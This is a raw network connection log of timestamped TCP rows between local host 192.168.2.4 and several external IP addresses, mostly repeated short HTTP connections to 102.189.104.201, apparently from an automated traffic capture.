Sep 2, 2024 11:42:55.287736893 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287758112 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287785053 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287802935 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287807941 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287832022 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287935972 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287967920 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.287976980 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.287981033 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288006067 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288021088 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288034916 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288058996 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288064003 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288088083 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288105011 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288140059 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288146973 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288150072 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288170099 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288187027 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288213968 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288220882 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288224936 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288254976 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288258076 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288304090 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288306952 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288343906 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.288367987 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.288408995 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.326927900 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.326980114 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.344249010 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.344265938 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.344284058 CEST	49763	443	192.168.2.4	191.96.144.157
Sep 2, 2024 11:42:55.344290972 CEST	443	49763	191.96.144.157	192.168.2.4
Sep 2, 2024 11:42:55.533071995 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:55.537970066 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:55.538803101 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:55.538932085 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:55.538964987 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:55.543740988 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:55.543802023 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.442466974 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.442933083 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.442991018 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.443064928 CEST	49764	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.451786041 CEST	80	49764	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.521883011 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.528386116 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.528479099 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.528613091 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.528635979 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:56.533716917 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:56.533741951 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.435973883 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.436006069 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.436084986 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.444169998 CEST	49765	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.446856022 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.448981047 CEST	80	49765	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.452456951 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.452533007 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.452656031 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.452670097 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:57.458699942 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:57.459357977 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:58.474567890 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:58.475080967 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:58.475161076 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:58.475342989 CEST	49766	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:58.480065107 CEST	80	49766	102.189.104.201	192.168.2.4
Sep 2, 2024 11:43:00.354140997 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:00.359081030 CEST	80	49767	91.202.233.158	192.168.2.4
Sep 2, 2024 11:43:00.359155893 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:00.359291077 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:00.364015102 CEST	80	49767	91.202.233.158	192.168.2.4
Sep 2, 2024 11:43:01.015923023 CEST	80	49767	91.202.233.158	192.168.2.4
Sep 2, 2024 11:43:01.018225908 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:01.020457029 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:01.025243044 CEST	80	49767	91.202.233.158	192.168.2.4
Sep 2, 2024 11:43:01.253674984 CEST	80	49767	91.202.233.158	192.168.2.4
Sep 2, 2024 11:43:01.253746033 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:43:02.790354013 CEST	49767	80	192.168.2.4	91.202.233.158
Sep 2, 2024 11:44:03.386234999 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:03.391207933 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:03.391325951 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:03.394293070 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:03.394335032 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:03.399008989 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:03.399243116 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:04.317811966 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:04.318155050 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:04.318218946 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:04.318255901 CEST	49768	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:04.322998047 CEST	80	49768	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:05.044246912 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:05.049134016 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:05.049225092 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:05.049413919 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:05.049464941 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:05.054183960 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:05.054351091 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.073779106 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.074044943 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.074213028 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.074213028 CEST	49769	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.079113007 CEST	80	49769	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.351778984 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.356616974 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.356704950 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.356914997 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.356957912 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:06.361639977 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:06.361814022 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:07.581283092 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:07.581305981 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:07.581353903 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:07.581368923 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:07.581408978 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:07.581495047 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:07.581549883 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:07.581598997 CEST	49770	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:07.586604118 CEST	80	49770	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.038732052 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:12.082082033 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.082185030 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:12.082320929 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:12.082345009 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:12.087419987 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.087888956 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.998900890 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.999180079 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:12.999243975 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:12.999290943 CEST	49771	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:13.004085064 CEST	80	49771	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:17.662122011 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:17.667491913 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:17.667587042 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:17.668303013 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:17.668315887 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:17.673233032 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:17.673244953 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:18.565588951 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:18.565639973 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:18.565696001 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:18.567667961 CEST	49772	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:18.572438955 CEST	80	49772	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.023355961 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.028376102 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.028445959 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.028577089 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.028598070 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.033447027 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.033457041 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.938311100 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.938483953 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:23.938544035 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.938621044 CEST	49773	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:23.943362951 CEST	80	49773	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:28.630630016 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:28.636410952 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:28.636591911 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:28.636660099 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:28.636702061 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:28.641403913 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:28.641412973 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:29.746076107 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:29.746098995 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:29.746102095 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:29.746263981 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:29.747273922 CEST	49774	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:29.752006054 CEST	80	49774	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:34.413392067 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:34.418369055 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:34.418472052 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:34.418683052 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:34.418730021 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:34.423876047 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:34.424309015 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:35.445287943 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:35.445424080 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:35.445478916 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:35.445557117 CEST	49775	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:35.450370073 CEST	80	49775	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:40.631159067 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:40.828152895 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:40.828241110 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:40.828445911 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:40.828496933 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:40.833626986 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:40.833637953 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:41.738900900 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:41.738929987 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:41.739106894 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:41.739191055 CEST	49776	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:41.743974924 CEST	80	49776	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:46.383697033 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:46.388638973 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:46.388710976 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:46.388853073 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:46.388881922 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:46.393692017 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:46.393780947 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:47.293251038 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:47.293919086 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:47.294090986 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:47.294137955 CEST	49777	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:47.298918009 CEST	80	49777	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:52.181566000 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:52.186511993 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:52.186588049 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:52.186712980 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:52.186736107 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:52.191611052 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:52.191621065 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:53.088325977 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:53.089015961 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:44:53.089075089 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:53.089108944 CEST	49778	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:44:53.094003916 CEST	80	49778	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:02.567892075 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:02.572719097 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:02.572798967 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:02.573009014 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:02.573051929 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:02.577999115 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:02.578007936 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:03.508183002 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:03.508304119 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:03.508358002 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:03.508399010 CEST	49779	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:03.514111042 CEST	80	49779	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:08.343564034 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:08.352791071 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:08.352869987 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:08.353020906 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:08.353049040 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:08.359559059 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:08.359570026 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:09.260143042 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:09.260932922 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:09.261012077 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:09.261063099 CEST	49780	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:09.265870094 CEST	80	49780	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:13.546924114 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:13.551810980 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:13.551981926 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:13.552021980 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:13.552045107 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:13.556859016 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:13.556974888 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:14.632817030 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:14.632920980 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:14.632945061 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:14.633022070 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:14.633174896 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:14.633174896 CEST	49781	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:14.641664982 CEST	80	49781	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:18.632395029 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:19.332583904 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:19.332767010 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:19.332861900 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:19.332880974 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:19.338335037 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:19.338460922 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:20.269524097 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:20.269622087 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:20.269684076 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:20.269764900 CEST	49782	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:20.274493933 CEST	80	49782	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:24.191524029 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:24.196618080 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:24.196727991 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:24.196890116 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:24.196913958 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:24.201687098 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:24.201698065 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:25.102648020 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:25.102674961 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:25.102742910 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:25.102879047 CEST	49783	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:25.107610941 CEST	80	49783	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:29.516664982 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:29.521507978 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:29.521595955 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:29.521807909 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:29.521850109 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:29.526802063 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:29.526882887 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:30.434545040 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:30.435791969 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:30.435854912 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:30.435903072 CEST	49784	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:30.440654993 CEST	80	49784	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:34.629934072 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:34.634794950 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:34.634881973 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:34.635025024 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:34.635061979 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:34.640130997 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:34.640153885 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:35.566848040 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:35.566879034 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:35.566946983 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:35.567115068 CEST	49785	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:35.572060108 CEST	80	49785	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:39.686680079 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:39.699932098 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:39.700220108 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:39.700259924 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:39.700280905 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:39.716533899 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:39.716542959 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:40.635361910 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:40.635473013 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:40.635664940 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:40.635813951 CEST	49786	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:40.640598059 CEST	80	49786	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:45.309797049 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:45.314971924 CEST	80	49787	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:45.315053940 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:45.315229893 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:45.315428019 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:45.319968939 CEST	80	49787	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:45.320171118 CEST	80	49787	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:46.244891882 CEST	80	49787	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:46.245985985 CEST	80	49787	102.189.104.201	192.168.2.4
Sep 2, 2024 11:45:46.246051073 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:46.246125937 CEST	49787	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:45:46.252334118 CEST	80	49787	102.189.104.201	192.168.2.4
